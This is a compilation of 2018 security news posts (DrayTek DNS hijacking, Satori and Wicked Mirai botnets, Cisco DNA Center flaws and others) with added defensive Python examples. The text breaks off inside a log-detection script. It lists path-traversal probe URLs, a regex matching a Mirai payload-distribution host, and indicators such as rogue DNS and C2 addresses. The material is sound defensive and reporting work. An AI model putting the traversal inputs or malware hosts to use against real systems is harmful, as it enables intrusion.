·      More than 800,000 DrayTek routers at risk due to a mysterious zero-day exploit
·      Updated – The new Wicked Mirai botnet leverages at least three new exploits


Pierluigi Paganini

(Security Affairs – Newsletter)


Misconfigured CalAmp server allowed hacker to take over a lot of vehicles

Security researchers discovered that a misconfigured server operated by the CalAmp company could allow anyone to access account data and take over the associated vehicle.

CalAmp is a company that provides backend services for several well-known systems.

Security researchers Vangelis Stykas and George Lavdanis discovered that a misconfigured server operated by the CalAmp company could allow anyone to access account data and take over the associated vehicle.

The experts were searching for security vulnerabilities in the Viper SmartStart system, a device that allows users to remotely start, lock, unlock, or locate their vehicles directly using a mobile app on their smartphones.

As with many other mobile applications, it used secure connections with SSL and certificate pinning (hard-coding in the client the certificate the server is known to use), so that connections from sites offering a bogus SSL certificate are automatically rejected.

The experts noticed that the app was connecting to the mysmartstart.com domain and also to a third-party domain (https://colt.calamp-ts.com/), the front end of the Calamp.com Lender Outlook service.

The experts discovered that the credentials of the user created in the Viper app could be used to log in to that panel.

“This panel seemed to be the frontend for Calamp.com Lender Outlook service. We tried our user created from the viper app, to login and it worked!” reads the blog post published by Stykas.

“This was a different panel which seemed to be targeted to the companies that have multiple sub-accounts and a lot of vehicles so that they can manage them.” 

Further tests allowed the researchers to verify that the portal itself was secured, but during the assessment they discovered that its reports were delivered by another dedicated server running TIBCO JasperReports software.

This was the first time the experts had analyzed this type of server, so they had to improvise; after removing all the request parameters they found they were already logged in as a user with limited rights but with access to a lot of reports.

“None of us were familiar with that so we had to improvise. Removing all the parameters we found out that we were already logged in with a limited user that had access to A LOT of reports.” continues the report.

“We had to run all those reports for our vehicles right? Well the ids for the user was passed automatically from the frontend but now we had to provide them from the panel as an input. And… well… we could provide any number we wanted.”

The researchers gained access to all the reports for all the vehicles (including location history), as well as to data sources containing usernames (the passwords were masked and could not be exported).

The server also allowed any existing report to be copied and edited.

“We could not create a report or an adhoc or pretty much anything else, but we could copy paste existing ones and edit them so we can do pretty much anything. We could also edit the report and add arbitrary XSS to steal information but this was not something that we (or anyone in their right lawful mind) would want to do.” continues the report.

Because all production databases, including the CalAmp connect device outlook, were available on the server, the researchers were able to take over a user account via the mobile application. An attacker who knows the account's old password could then simply walk to the car, unlock it, start the engine, and possibly steal the vehicle.

According to the experts, exploiting the flaw could allow:

  • Well the very obvious just change the user password to a known one go to the car, unlock, start and leave.
  • Get all the reports of where everyone was
  • Stop the engine while someone was driving ?
  • Start the engine when you shouldn’t.
  • Get all the users and leak.
  • As we haven’t actually seen the hardware we might be able to pass can bus messages though the app ?
  • Get all the IoT devices from connect database or reset a password there and start poking around.
  • Really the possibilities are endless…

The experts reported the issue to CalAmp at the beginning of May 2018, and the company addressed the flaw in ten days.
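
The core defect the researchers describe is that the report server accepted any vehicle id supplied by the client, with no check that the id belonged to the logged-in account (an insecure direct object reference). The following Python sketch, added here and not taken from CalAmp, Viper or the researchers' post, shows that pattern beside the object-level authorization check that closes it; the account names, vehicle ids and location records are constructed sample data.

```python
from dataclasses import dataclass, field
from typing import Dict, List, Set

# Constructed sample data standing in for the reporting backend's data source.
# Account names, vehicle ids and location strings are made up for the example.
VEHICLE_OWNER: Dict[int, str] = {101: "alice", 102: "alice", 205: "bob"}
LOCATION_HISTORY: Dict[int, List[str]] = {
    101: ["2018-05-01T08:00 home", "2018-05-01T08:45 office"],
    102: ["2018-05-01T18:10 gym"],
    205: ["2018-05-01T07:30 school"],
}


class AuthorizationError(Exception):
    pass


@dataclass
class Session:
    user: str
    role: str = "limited"      # the report server's default low-privilege role
    audit: List[str] = field(default_factory=list)


def run_report_insecure(session: Session, vehicle_id: int) -> List[str]:
    """The pattern the researchers describe: the vehicle id is taken straight
    from the request and used as the report parameter. Any id returns data."""
    return LOCATION_HISTORY.get(vehicle_id, [])


def vehicles_for(user: str) -> Set[int]:
    """Resolve the caller's own vehicles server-side, from the session identity."""
    return {vid for vid, owner in VEHICLE_OWNER.items() if owner == user}


def run_report_secure(session: Session, vehicle_id: int) -> List[str]:
    """Object-level authorization: refuse ids outside the caller's own set,
    regardless of what the frontend sent. Denials are logged so a client
    walking through id values is visible in the audit trail."""
    if vehicle_id not in vehicles_for(session.user):
        session.audit.append(f"DENY user={session.user} vehicle={vehicle_id}")
        raise AuthorizationError(f"vehicle {vehicle_id} not owned by {session.user}")
    session.audit.append(f"ALLOW user={session.user} vehicle={vehicle_id}")
    return LOCATION_HISTORY[vehicle_id]


def demo() -> dict:
    """Run bob against alice's vehicle on both variants and against his own."""
    bob = Session(user="bob")
    leaked = run_report_insecure(bob, 101)      # alice's history, no check at all
    try:
        run_report_secure(bob, 101)
        blocked = False
    except AuthorizationError:
        blocked = True
    own = run_report_secure(bob, 205)
    return {"leaked": leaked, "blocked": blocked, "own": own, "audit": bob.audit}


if __name__ == "__main__":
    print(demo())
```

The point of the secure variant is that the set of permitted ids is derived server-side from the session, never from the request, and that denials are written to an audit trail so id enumeration shows up in logs.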

Pierluigi Paganini

(Security Affairs – CalAmp, car hacking)


Experts propose a new variation of the Spectre attack to recover data from System Management Mode

Researchers from Eclypsium proposed a new variation of the Spectre attack that can allow attackers to recover data stored inside CPU System Management Mode.

Security experts from Eclypsium have devised a new variation of the Spectre attack that can allow attackers to recover data stored inside the CPU System Management Mode (SMM), also known as ring -2.

The SMM is an operating mode of x86 CPUs in which all normal execution, including the operating system, is suspended.

When execution is transferred to SMM, the operating system is suspended and a portion of the UEFI/BIOS firmware runs with elevated privileges and with access to all data and hardware.

“The main benefit of SMM is that it offers a distinct and easily isolated processor environment that operates transparently to the operating system or executive and software applications.” reads Wikipedia.

SMM was first released with the Intel 386SL in the early 90s. Intel CPUs implement a memory protection mechanism known as a range register to protect the sensitive contents of memory regions such as SMM memory.

SMM memory on Intel CPUs is protected by a special type of range registers known as System Management Range Register (SMRR).

Eclypsium experts based their study on public proof-of-concept code for the Spectre variant 1 (CVE-2017-5753) vulnerability, using it to bypass the SMRR mechanism and access the contents of System Management RAM (SMRAM), which contains the SMM code and holds its working data.

“Because SMM generally has privileged access to physical memory, including memory isolated from operating systems, our research demonstrates that Spectre-based attacks can reveal other secrets in memory (eg. hypervisor, operating system, or application).” states the report published by Eclypsium.

“These enhanced Spectre attacks allow an unprivileged attacker to read the contents of memory, including memory that should be protected by the range registers, such as SMM memory. This can expose SMM code and data that was intended to be confidential, revealing other SMM vulnerabilities as well as secrets stored in SMM.”

The experts ported the PoC code to a kernel driver and demonstrated that it works from the kernel privilege level. They then ran the exploit code from the kernel privilege level against protected memory.

“The kernel-level PoC exploit provides access to different hardware interfaces, which gives attackers better control over the system hardware and access to different hardware interfaces such as physical memory, IO, PCI, and MMIO interfaces. It also provides access to interfaces at a higher privilege level, such as software SMI.” explained the researchers.

“Next, we integrated the PoC exploit into CHIPSEC in order to quickly expand our tests. In our first experiment, we tried to read protected SMRAM memory. We mapped the physical addresses of SMRAM into the virtual address space and then used the SMRAM addresses as the target of our exploit.” 

The experts believe that Spectre variant 2 (CVE-2017-5715) can also achieve the same results.

Eclypsium reported the new attack technique to Intel in March. Intel replied that the security updates released for the Spectre variant 1 and variant 2 should be enough to mitigate this new attack.

Pierluigi Paganini

(Security Affairs – Spectre, hacking)


Chrome evolves security indicators by marking with a red warning for HTTP content

Starting with Chrome 70, Google will mark HTTP content with a red warning, continuing its effort to make the web more secure.

Since January 2017, Chrome has indicated connection security with an icon in the address bar that labels HTTP connections to sites as non-secure, and since May 2017 Google has marked newly registered sites that serve login pages or password input fields over HTTP as not secure.

Back to the present: as of May 2018, more than 93% of the overall traffic to several Google products is encrypted.

“Security is a top priority at Google. We are investing and working to make sure that our sites and services provide modern HTTPS by default. Our goal is to achieve 100% encryption across our products and services. The chart below shows how we’re doing across Google.” reads the Google Transparency report.

This is an important success for Google; consider that in early 2014 only 50% of the traffic was encrypted.

According to the Google Transparency report, around 75% of the pages loaded via Chrome in early May 2018 were served over secure HTTPS connections, while in 2014 the percentage was only around 40%.

Google now plans to mark unencrypted connections with a red “Not Secure” warning.

“Previously, HTTP usage was too high to mark all HTTP pages with a strong red warning, but in October 2018 (Chrome 70), we’ll start showing the red “not secure” warning when users enter data on HTTP pages,” reads a blog post published by Google.

Chrome 70 treatment for HTTP pages with user input

“We hope these changes continue to pave the way for a web that’s easy to use safely, by default. HTTPS is cheaper and easier than ever before, and unlocks powerful capabilities — so don’t wait to migrate to HTTPS! Check out our set-up guides to get started.” explained Emily Schechter, Product Manager, Chrome Security.

Pierluigi Paganini

(Security Affairs – Chrome 70, HTTPS)


More than 800,000 DrayTek routers at risk due to a mysterious zero-day exploit

DrayTek routers are affected by a zero-day vulnerability that could be exploited by attackers to change DNS settings on some models.

Routers manufactured by the Taiwan-based vendor DrayTek are affected by a zero-day vulnerability that could be exploited by attackers to change DNS settings on some of its routers.

DrayTek confirmed it is aware that hackers are attempting to exploit the zero-day vulnerability to compromise its routers.

Many users reported on Twitter cyber attacks against their routers; in these cases, the hackers changed the routers' DNS settings to point to a server with the IP address 38.134.121.95, on the network of China Telecom.

It is likely attackers are conducting a Man-in-the-Middle attack to redirect users to bogus clones of legitimate sites to steal their credentials.

DrayTek published a security advisory warning of the attacks and providing instructions on how to check and correct DNS settings.

“In May 2018, we became aware of new attacks against web-enabled devices, which includes DrayTek routers. The recent attacks have attempted to change DNS settings of routers.” reads the security advisory.

“If you have a router supporting multiple LAN subnets, check settings for each subnet. Your DNS settings should be either blank, set to the correct DNS server addresses from your ISP or DNS server addresses of a server which you have deliberately set (e.g. Google 8.8.8.8). A known rogue DNS server is 38.134.121.95 – if you see that, your router has been changed.”

The company is already working on firmware updates to patch the issue.
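
The advisory's check (blank, ISP-assigned, or deliberately chosen resolvers are fine; 38.134.121.95 means the router has been changed) is easy to mechanize for a fleet of routers. The following Python function, added here and not part of the advisory or of DrayTek's tooling, applies that policy to the DNS fields exported per LAN subnet; the export format, the ISP resolver addresses and the sample subnets are constructed for the example, and the allow-lists must be filled in with the operator's own values.

```python
import ipaddress
from typing import Dict, List

# Known rogue resolver named in the DrayTek advisory.
ROGUE_DNS = {"38.134.121.95"}

# Resolvers the operator deliberately chose (the advisory's example is Google
# 8.8.8.8) plus the ISP's resolvers. The ISP addresses below are constructed
# placeholders from a documentation range; replace them with the real ones.
CHOSEN_DNS = {"8.8.8.8", "8.8.4.4"}
ISP_DNS = {"203.0.113.53", "203.0.113.54"}


def check_dns_settings(per_subnet: Dict[str, List[str]]) -> List[str]:
    """Return one finding per DNS entry that violates the advisory's policy.

    per_subnet maps a LAN name (e.g. 'LAN1') to the DNS fields as exported
    from the router's configuration; an empty string means 'blank', which the
    advisory allows because the router then uses the ISP defaults."""
    findings: List[str] = []
    allowed = ISP_DNS | CHOSEN_DNS
    for lan, servers in per_subnet.items():
        for raw in servers:
            value = raw.strip()
            if not value:
                continue                                  # blank: allowed
            try:
                ipaddress.ip_address(value)
            except ValueError:
                findings.append(f"{lan}: unparsable DNS entry {value!r}")
                continue
            if value in ROGUE_DNS:
                findings.append(f"{lan}: KNOWN ROGUE DNS {value} - router has been changed")
            elif value not in allowed:
                findings.append(f"{lan}: unexpected DNS {value} - verify who set it")
    return findings


# Constructed export: LAN1 is clean, LAN2 was hijacked, LAN3 points at an
# address nobody on the team configured.
SAMPLE_EXPORT = {
    "LAN1": ["", "8.8.8.8"],
    "LAN2": ["38.134.121.95", ""],
    "LAN3": ["198.51.100.7", "203.0.113.53"],
}

if __name__ == "__main__":
    for finding in check_dns_settings(SAMPLE_EXPORT):
        print(finding)
```

A hit on the rogue address is a confirmed compromise of that router, not just a misconfiguration, so the follow-up is the advisory's own: correct the setting, then apply the firmware update once released.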

DrayTek published a second advisory that lists the affected devices and the firmware versions it is going to release in the coming days.

Initially, the company suspected that the victims were using DrayTek routers with default credentials, but one of them clarified that their device was not using factory settings, a circumstance that confirms the attackers are in possession of a zero-day exploit.

Searching for DrayTek routers with Shodan turns up more than 800,000 devices connected online, some of which could be compromised with the mysterious exploit.

Pierluigi Paganini

(Security Affairs – DrayTek routers, hacking)


A dataset of 200 million PII exfiltrated from several Japanese websites offered on underground market

FireEye iSIGHT Intelligence discovered on the underground market a dataset allegedly containing 200 million unique sets of personally identifiable information stolen from several popular Japanese websites.

Security experts from FireEye iSIGHT Intelligence have discovered on underground forums a dataset allegedly containing 200 million unique sets of personally identifiable information (PII) stolen from several popular Japanese website databases.

It’s likely the data was taken via opportunistic compromise.

The dataset was found in an instant-messenger group used for sharing and offering data.

The huge trove of data was first discovered in December 2017; the archive was offered by a Chinese user for around $150.

Stolen records included names, credentials, email addresses, dates of birth, phone numbers, and home addresses.

The huge archive is composed of data stolen from Japanese websites in a variety of industries, including the retail, transportation, food and beverage, financial, and entertainment sectors.

According to the experts, the data was harvested between May and June 2016; the threat actor has offered site databases for sale on Chinese underground forums since at least 2013.

“Yes, we’ve observed actors who were selling Japanese PII data or interested in purchase,” said Oleg Bondarenko, senior manager for international research at FireEye. “However [we] have never observed at such scale.”

Many users commented on the advertisement, showing their interest in the data, but some of them left negative feedback because they did not receive the purchased database.

“The data was extremely varied and not available through publicly available data sources; therefore, we believe that the advertised data is genuine,” states FireEye.

Experts believe the data is genuine; they noticed that most of the email addresses in a random sample of 200,000 belong to major third-party leaks.

“Since we did not observe most of the leaked data in any dataset as coming from one specific leak or on any publicly available website, this also indicates that the actor is unlikely to have bought or scraped the information from data leaks and resold it as a new product,” continues FireEye.

The analysis of another sample of 190,000 credentials revealed that 36% were duplicate values and that a huge number of the email addresses were fake.
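
FireEye's genuineness assessment rests on simple dataset statistics: how many rows repeat an address, and how many addresses are obviously fabricated. The following Python triage routine, added here and not FireEye's code, computes those two figures for a credential dump in email:password form; the dump lines are constructed for the example, and the fake-address heuristics are assumptions made for this example, not FireEye's criteria.

```python
import re
from collections import Counter
from typing import Dict, List

# Deliberately strict syntax check: anything it rejects is treated as fabricated.
_EMAIL_RE = re.compile(r"^[A-Za-z0-9._%+-]+@([A-Za-z0-9-]+\.)+[A-Za-z]{2,}$")


def looks_fake(email: str) -> bool:
    """Heuristics (assumed for this example) for fabricated addresses:
    syntactically invalid, local parts that are only digits or one repeated
    character, or domains in reserved test TLDs."""
    if not _EMAIL_RE.match(email):
        return True
    local, domain = email.rsplit("@", 1)
    if local.isdigit() or len(set(local)) == 1:
        return True
    if domain.lower().endswith((".example", ".test", ".invalid", ".local")):
        return True
    return False


def triage(records: List[str]) -> Dict[str, float]:
    """Summarise a dump of 'email:password' lines: row count, unique
    addresses, percentage of rows that repeat an earlier address, and the
    percentage of unique addresses that look fabricated."""
    emails: List[str] = []
    for line in records:
        line = line.strip()
        if not line or ":" not in line:
            continue                      # skip blank or malformed rows
        email, _password = line.split(":", 1)
        emails.append(email.strip().lower())
    total = len(emails)
    counts = Counter(emails)
    duplicates = total - len(counts)      # rows that repeat an earlier address
    fake = sum(1 for e in counts if looks_fake(e))
    return {
        "rows": total,
        "unique": len(counts),
        "duplicate_pct": round(100 * duplicates / total, 1) if total else 0.0,
        "fake_unique_pct": round(100 * fake / len(counts), 1) if counts else 0.0,
    }


# Constructed sample dump; none of these addresses come from the dataset in the article.
SAMPLE_DUMP = [
    "alice@example-shop.jp:pass1",
    "alice@example-shop.jp:pass1",
    "bob@mail.co.jp:hunter2",
    "12345@junk.jp:x",
    "aaaaaaa@junk.jp:x",
    "broken-address:x",
    "carol@rail-tickets.jp:secret",
    "bob@mail.co.jp:hunter2",
]

if __name__ == "__main__":
    print(triage(SAMPLE_DUMP))
```

A high duplicate rate or a large fabricated share, as in FireEye's 190,000-row sample, lowers confidence that the advertised record count reflects distinct victims, which is exactly the question an analyst has to answer before treating a dump as a new exposure.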

The seller was offering data stolen from websites in China, Taiwan, Hong Kong, European countries, Australia, New Zealand, and North American countries.

“Since much of this information has been previously leaked in large-scale data leaks, as well as the possibility that it has been previously sold, we anticipate that this dataset will not enable new large scale malicious activity against targeted entities or individuals with leaked PII,” FireEye concluded.

According to the officials, the scale of the data put up for sale is unprecedented for Japan.

FireEye is warning Japanese government offices and affected businesses. They say the information could be used to carry out cyberattacks on Japan.

Masatomi Iwama, an executive of FireEye’s Japan branch, explained that people must be careful about their security hygiene.

Pierluigi Paganini

(Security Affairs – Japanese websites, data leak)


A New Mexico man sentenced to 15 Years in jail for DDoS Attacks and possession of firearms

A New Mexico man admitted being responsible for DDoS attacks against the websites of former employers, business competitors, and public services.

John Kelsey Gammell, 55, from New Mexico has been sentenced to 15 years in prison for launching distributed denial-of-service (DDoS) attacks on dozens of organizations and for firearms-related charges.

The man used popular “DDoS-for-hire” services, including VDoS, CStress, Inboot, Booter.xyz, and IPStresser, to power the DDoS attacks against his victims.

The list of victims is long and includes business competitors, former employers, law enforcement agencies, courts, banks, telecoms companies, and firms that refused to hire him.

The man used VPN services to hide his identity and cryptocurrency for his payments, but he was identified because of poor operational security. While the victims were under DDoS attack, he sent them emails offering his services to mitigate the problem. The emails were sent from Gmail and Yahoo accounts that he accessed from his home without masking his real IP address.


The man initially rejected a plea deal, but in January he pleaded guilty to intentionally causing damage to a protected computer, admitting that he launched DDoS attacks on websites in the United States between July 2015 and March 2017. He also pleaded guilty to two counts of being a felon in possession of firearms and ammunition.

The man was sentenced to 180 months in prison and will have to compensate the victims of his DDoS attacks; the amount of restitution has yet to be determined.

Pierluigi Paganini

(Security Affairs – distributed denial-of-service, cybercrime)

 

The post A New Mexico man sentenced to 15 Years in jail for DDoS Attacks and possession of firearms appeared first on Security Affairs.



Satori Botnet is targeting exposed Ethereum mining pools running the Claymore mining software

While a new variant of the dreaded Mirai botnet, the so-called Wicked Mirai, emerged in the wild, the operators of Satori, another Mirai variant, appear very active.

Experts observed hackers using the Satori botnet to mass-scan the Internet for exposed Ethereum miners, looking for devices with TCP port 3333 reachable online.

TCP port 3333 is commonly used for the remote management interface of cryptocurrency-mining software, so it is open on a large number of mining rigs.

The activities were reported by several research teams, including Qihoo 360 Netlab, SANS ISC,  and GreyNoise Intelligence.

Starting on May 11, experts observed a spike in the activity of the Satori botnet.

According to the researchers at GreyNoise, the threat actors are focused on equipment running the Claymore mining software: once they find a host running this software, they push instructions that force the miner to join the ‘dwarfpool’ mining pool using an ETH wallet controlled by the attackers, so the hijacked rig mines on their behalf.

The experts noticed that most of the devices involved in the mass scanning are compromised GPON routers located in Mexico.

The experts monitored five botnets using compromised GPON routers to scan for Claymore miners; one of them is the Satori botnet, which leverages an exploit for the attack.

Below are the details of the five botnets published by Netlab 360:

  • Satori: Satori is the infamous variant of the mirai botnet.
    • We first observed this botnet coming after the GPON vulnerable devices at 2018-05-10 05:51:18, several hours before our last publish.
    • It has quickly overtaken muhstik as the No.1 player.
  • Mettle: A malicious campaign based on IP addresses in Vietnam (C2 210.245.26.180:4441, scanner 118.70.80.143) and the mettle open source control module
  • Hajime: Hajime pushed an update which adds the GPON exploits
  • Two Mirai variants: At least two malicious branches are actively exploiting this vulnerability to propagate mirai variants. One of them has been called omni by the newskysecurity team.
  • imgay: This appears to be a botnet that is under development. Its function is not finished yet.

“In our previous article, we mentioned that since this GPON vulnerability (CVE-2018-10561, CVE-2018-10562) was announced, there have been at least five botnet families, mettle, muhstik, mirai, hajime and satori, actively exploiting the vulnerability to build their zombie army in just 10 days.” reads a blog post published by Netlab 360.

“From our estimate, only 2% of all GPON home routers are affected, most of which are located in Mexico.”

“The source of this scan is about 17k independent IP addresses, mainly from Uninet SA de CV, telmex.com, located in Mexico.”

Researchers at SANS ISC who analyzed the Satori botnet activity discovered that the bot is currently exploiting CVE-2018-1000049, a remote code execution flaw that affects the Nanopool Claymore Dual Miner software.

The experts noted that proof-of-concept code for CVE-2018-1000049 is publicly available.

“The scan is consistent with a vulnerability, CVE 2018-1000049, released in February [2]. The JSON RPC remote management API does provide a function to upload “reboot.bat”, a script that can then be executed remotely. The attacker can upload and execute an arbitrary command using this feature.” reads the analysis published by the SANS ISC.

“The port the API is listening on is specified when starting the miner, but it defaults to 3333. The feature allows for a “read-only” mode by specifying a negative port, which disables the most dangerous features. There doesn’t appear to be an option to require authentication.”
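The SANS ISC note above gives the defender everything needed for a configuration audit: the API port is chosen at miner start-up, it defaults to 3333, a negative port puts the API in read-only mode, and there is no authentication option. The following is an added example, not part of the SANS or Security Affairs write-ups, that classifies the exposure of each rig from the command line it was started with. It assumes the port is passed as “-mport <n>” (the flag name is not given in the article) and uses a constructed inventory of hostnames and command lines.

```python
import shlex
from dataclasses import dataclass

DEFAULT_MGMT_PORT = 3333  # the JSON-RPC API listens here when no port is given (SANS ISC)


@dataclass
class MgmtPortAudit:
    host: str
    port: int        # TCP port of the management API, 0 when disabled
    mode: str        # "disabled", "read-only" or "read-write"
    explicit: bool   # whether the port was set on the command line at all
    risk: str        # "none", "low" or "high"


def audit_claymore_cmdline(host, cmdline):
    """Classify a miner's management API exposure from its start command line.

    Assumption of this example: the port is passed as '-mport <n>', where a
    negative n selects read-only mode, 0 disables the API, and an absent flag
    means the default port 3333 in read-write mode.
    """
    args = shlex.split(cmdline, posix=False)  # posix=False keeps Windows paths intact
    value = None
    for i, tok in enumerate(args):
        if tok.lower() == "-mport" and i + 1 < len(args):
            value = args[i + 1].strip('"')
    explicit = value is not None
    raw = int(value) if explicit else DEFAULT_MGMT_PORT
    if raw == 0:
        mode, risk = "disabled", "none"
    elif raw < 0:
        mode, risk = "read-only", "low"     # file upload and execution unavailable
    else:
        mode, risk = "read-write", "high"   # unauthenticated command execution reachable
    return MgmtPortAudit(host, abs(raw), mode, explicit, risk)


def find_exposed(inventory):
    """Return the audits of hosts whose miner accepts unauthenticated management commands."""
    audits = (audit_claymore_cmdline(h, c) for h, c in inventory)
    return [a for a in audits if a.risk == "high"]


# Constructed inventory (hostname, miner start command); not real systems or wallets.
SAMPLE_INVENTORY = [
    ("rig-01", r'C:\miner\EthDcrMiner64.exe -epool eth-eu1.pool.example:4444 -ewal 0xDEADBEEF -mport 3333'),
    ("rig-02", r'C:\miner\EthDcrMiner64.exe -epool eth-eu1.pool.example:4444 -ewal 0xDEADBEEF -mport -3333'),
    ("rig-03", r'C:\miner\EthDcrMiner64.exe -epool eth-eu1.pool.example:4444 -ewal 0xDEADBEEF'),
    ("rig-04", r'C:\miner\EthDcrMiner64.exe -epool eth-eu1.pool.example:4444 -ewal 0xDEADBEEF -mport 0'),
]

if __name__ == "__main__":
    for audit in find_exposed(SAMPLE_INVENTORY):
        print(f"{audit.host}: management API {audit.mode} on tcp/{audit.port}, risk {audit.risk}")
```

Note the third rig: it never mentions the port at all and is still exposed, because the default is read-write on 3333. Since the API cannot be password-protected, a rig that genuinely needs remote management should also be firewalled so that port 3333 is reachable only from the operator’s network.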

Pierluigi Paganini

(Security Affairs – Satori Botnet, hacking)

The post Satori Botnet is targeting exposed Ethereum mining pools running the Claymore mining software appeared first on Security Affairs.

CISCO issued security updates to address three critical flaws in Cisco DNA Center

Cisco has issued security updates to address three critical vulnerabilities in its DNA Center appliance, admins need to update their installs as soon as possible.

Cisco has issued security updates to address three critical vulnerabilities in its Digital Network Architecture (DNA) Center appliance.

DNA Center is a network management and administration tool. The three vulnerabilities could be exploited by remote, unauthenticated attackers to take over the appliance.

The most severe issue is a static credentials vulnerability (CVE-2018-0222) affecting DNA Center: an attacker who knows the credentials can completely take over the targeted appliance.

“A vulnerability in Cisco Digital Network Architecture (DNA) Center could allow an unauthenticated, remote attacker to log in to an affected system by using an administrative account that has default, static user credentials.” reads the security advisory published by Cisco.

The experts found undocumented, static user credentials for the default administrative account in the affected software.

“The vulnerability is due to the presence of undocumented, static user credentials for the default administrative account for the affected software. An attacker could exploit this vulnerability by using the account to log in to an affected system.” continues the advisory.

“A successful exploit could allow the attacker to log in to the affected system and execute arbitrary commands with root privileges.”

The second vulnerability tracked as CVE-2018-0271 affects the API gateway of the Cisco Digital Network Architecture (DNA) Center.

The flaw could be exploited by a remote, unauthenticated attacker to bypass authentication and gain privileged access to critical services in DNA Center.

“A vulnerability in the API gateway of the Cisco Digital Network Architecture (DNA) Center could allow an unauthenticated, remote attacker to bypass authentication and access critical services.” reads the Cisco advisory.

“The vulnerability is due to a failure to normalize URLs prior to servicing requests. An attacker could exploit this vulnerability by submitting a crafted URL designed to exploit the issue,”
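Cisco only says that the gateway failed to normalize URLs before servicing requests; the advisory gives no detail of the crafted URL. The following is an added example, not Cisco’s code and not the DNA Center bypass, that illustrates the bug class in general: an authorization check applied to the raw request path, beside one applied to the canonical path the backend will actually act on. The route prefixes are hypothetical.

```python
import posixpath
from urllib.parse import unquote, urlsplit

# Hypothetical route layout for the example, not DNA Center's real API paths.
PUBLIC_PREFIXES = ("/api/public/",)


def vulnerable_requires_auth(raw_path):
    """Authorization decided on the path exactly as received.

    A caller who starts the path with a public segment and then climbs out of
    it with '..' (plain or percent-encoded) passes this check, while the
    component that eventually resolves the path serves the protected resource.
    """
    return not raw_path.startswith(PUBLIC_PREFIXES)


def canonicalize(raw_path):
    """Reduce a request path to the single form the backend will act on.

    Drops query and fragment, percent-decodes until stable (defeats double
    encoding), rejects NUL and backslash, then collapses '.', '..' and
    repeated slashes. posixpath.normpath never lets '..' climb above '/'.
    """
    path = urlsplit(raw_path).path
    for _ in range(3):
        decoded = unquote(path)
        if decoded == path:
            break
        path = decoded
    else:
        raise ValueError("path still changing after 3 decode rounds")
    if "\x00" in path or "\\" in path:
        raise ValueError("path contains NUL or backslash")
    return posixpath.normpath("/" + path.lstrip("/"))


def hardened_requires_auth(raw_path):
    """Same policy as above, but evaluated on the canonical path; default deny."""
    return not canonicalize(raw_path).startswith(PUBLIC_PREFIXES)


# Constructed probe requests illustrating the bug class.
PROBES = [
    "/api/public/status",                    # genuinely public
    "/api/public/../system/config",          # plain traversal out of the public prefix
    "/api/public/%2e%2e/system/config",      # percent-encoded dots
    "/api/public/%252e%252e/system/config",  # double-encoded dots
    "/api/public//..//system/config?x=1",    # duplicate slashes plus a query string
]


def compare(probes):
    """(path, auth required by vulnerable check, auth required by hardened check)."""
    return [(p, vulnerable_requires_auth(p), hardened_requires_auth(p)) for p in probes]


if __name__ == "__main__":
    for path, weak, strong in compare(PROBES):
        print(f"{path:45} vulnerable={weak!s:5} hardened={strong}")
```

The general rule the example shows: every layer that makes a security decision on a URL must see the same canonical form as the layer that serves it, and decoding must be bounded and repeated until stable, since one decode pass is exactly what double encoding is designed to slip past.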


The third critical flaw in DNA Center fixed by Cisco, tracked as CVE-2018-0268, could be exploited by an attacker to bypass authentication within the container instances and obtain elevated privileges.

“This vulnerability is due to an insecure default configuration of the Kubernetes container management subsystem within DNA Center,” states the Cisco security advisory. “An attacker who has the ability to access the Kubernetes service port could execute commands with elevated privileges within provisioned containers. A successful exploit could result in a complete compromise of affected containers.”

Cisco rolled out the security update to DNA Center via its System Updates tool; admins need to install version 1.1.3 as soon as possible.

Pierluigi Paganini

(Security Affairs – Cisco DNA Center, hacking)

The post CISCO issued security updates to address three critical flaws in Cisco DNA Center appeared first on Security Affairs.

Updated – The new Wicked Mirai botnet leverages at least three new exploits

Security experts from Fortinet have spotted a new variant of the Mirai botnet dubbed ‘Wicked Mirai’; it includes new exploits and spreads a new bot.

The name Wicked Mirai comes from strings in the code; the experts discovered that this new variant includes at least three new exploits compared to the original.

“The FortiGuard Labs team has seen an increasing number of Mirai variants, thanks to the source code being made public two years ago.” reads the analysis published by Fortinet.

“Some made significant modifications, such as adding the capability to turn infected devices into swarms of malware proxies and cryptominers. Others integrated Mirai code with multiple exploits targeting both known and unknown vulnerabilities, similar to a new variant recently discovered by FortiGuard Labs, which we now call WICKED.”


The Mirai botnet was first spotted in 2016 by the experts at MalwareMustDie; at the time it was used to power massive DDoS attacks in the wild. Mirai’s source code was leaked online in October 2016, and since then many other variants have emerged in the wild, including Satori, Masuta, and Okiru.

According to Fortinet, the author of Wicked Mirai is the same person behind the Sora, Owari, and Omni variants.

Mirai botnets are usually composed of three main modules: Attack, Killer, and Scanner. Fortinet focused its analysis on the Scanner module, which is responsible for the propagation of the malware.

The original Mirai relied on brute-force login attempts to compromise other IoT devices, while Wicked Mirai uses known exploits.

Wicked Mirai scans ports 8080, 8443, 80, and 81 by initiating a raw-socket SYN connection to IoT devices. Once it has established a connection, the bot attempts to exploit the device and download its payload by writing the exploit strings to the socket through the write() syscall.

The experts discovered that the exploit used depends on the specific port the bot was able to connect to; Fortinet’s report maps each port to the device type it targets.

The analysis of the code revealed the presence of the string SoraLOADER, which suggested it might attempt to distribute the Sora botnet. Further investigation led the researchers to reject this hypothesis: the bot actually connects to a malicious domain to download the Owari Mirai bot.

“After a successful exploit, this bot then downloads its payload from a malicious web site, in this case, hxxp://185[.]246[.]152[.]173/exploit/owari.{extension}. This makes it obvious that it aims to download the Owari bot, another Mirai variant, instead of the previously hinted at Sora bot.” reads the analysis.

“However, at the time of analysis, the Owari bot samples could no longer be found in the website directory. In another turn of events, it turns out that they have been replaced by the samples shown below, which were later found to be the Omni bot.”

The analysis of the website’s /bins directory revealed other Omni samples, which were apparently delivered using the GPON vulnerability CVE-2018-10561.
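Two observable behaviours come out of the Fortinet analysis above: the scanner sends bare SYNs to ports 80, 81, 8080 and 8443 across many hosts, and an exploited device then fetches its stage-two binary from the /exploit or /bins directory on 185.246.152.173. The following is an added example, not part of Fortinet’s report, that looks for both in logs; the firewall and proxy log lines, their format, and the payload file names are constructed for the demonstration, and the IP is the one defanged in the post.

```python
import re
from collections import defaultdict

WICKED_SCAN_PORTS = {80, 81, 8080, 8443}  # ports the Wicked scanner probes (Fortinet)
# Distribution host and directories from the Fortinet write-up, un-defanged for matching.
PAYLOAD_RE = re.compile(r"^https?://185\.246\.152\.173/(exploit|bins)/\S+", re.I)

# Constructed firewall log (not real traffic): ts src dst dport tcp_flags
SAMPLE_FW_LOG = """\
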